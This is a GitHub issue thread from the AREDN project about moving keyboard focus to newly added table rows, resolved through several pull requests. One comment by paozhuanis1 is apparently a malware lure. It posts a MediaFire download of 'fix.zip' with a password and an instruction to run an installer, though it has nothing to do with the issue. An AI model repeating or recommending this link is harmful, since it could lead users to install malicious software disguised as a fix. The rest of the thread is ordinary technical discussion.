aredn/aredn #1408: Set focus to first field of newly added table row; bind ENTER to add additional rows.

pmilazzo, 2024-08-26:
**Is your feature request related to a problem? Please describe.**
When I add a new row to a table in the New UI, the focus remains on the [+] button and TAB takes me to the first row of the table. Thus I either have to click in the first field of the newly added row or press TAB many times to get to the field. This behavior becomes particularly awkward when adding multiple new lines to the table.

**Describe the solution you'd like**
When the [+] button is pressed and a new row appears at the bottom of the table, immediately set the focus to the first field of that newly added row.

It might also be worth considering binding ENTER to add an additional row while the focus is in one of the fields of the newly added row. That way, one could simply tab through the row filling out the fields, and then press ENTER to continue on the next row.

paozhuanis1, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

aanon4, 2024-08-26:
Can we split the ENTER part out to a separate issue? Thanks.

pmilazzo, 2024-08-26:
OK; here's just the first task:
- [ ] When the [+] button is pressed and a new row appears at the bottom of the table, immediately set the focus to the first field of that newly added row.

aanon4, 2024-08-26:
https://github.com/aredn/aredn/pull/1410

pmilazzo, 2024-08-27:
Excellent; thanks! Works great for:
- Add service
- Host aliases
- Port Forwarding
- Address Reservations
- Add tunnel

Doesn't work for
- Tags
- Options

aanon4, 2024-08-27:
Ah heck - forgot about those two below the fold. Will add them (and ENTER too).

aanon4, 2024-08-27:
https://github.com/aredn/aredn/pull/1416

pmilazzo, 2024-08-28:
OK, the Tags table now works perfectly. It's awesome; thanks!

The Options table works, but it behaves a bit oddly in that new lines initially have the focus on the third field rather than the first. Perhaps that's because the first two are &lt;select&gt; fields?

aanon4, 2024-08-29:
I can select any field - should it just be the first one here?

aanon4, 2024-08-29:
https://github.com/aredn/aredn/pull/1421

So this would put the focus on the first select field of an dhcp option. I'll observer that there's no focus indicator on a select, so its visually not obvious this has happened, unlike the focus on the input field.

Let me know if you prefer this and I'll commit the PR.

pmilazzo, 2024-08-29:
Yes, thanks, I think the focus should be on the first field of a new row.

I noticed the lack of focus indication in a number of places. I assume it was a deliberate choice?

aanon4, 2024-08-29:
It was, yes. I'll commit the fix. Thanks.

pmilazzo, 2024-08-29:
Works great; thanks!

closed 2024-08-30 by aanon4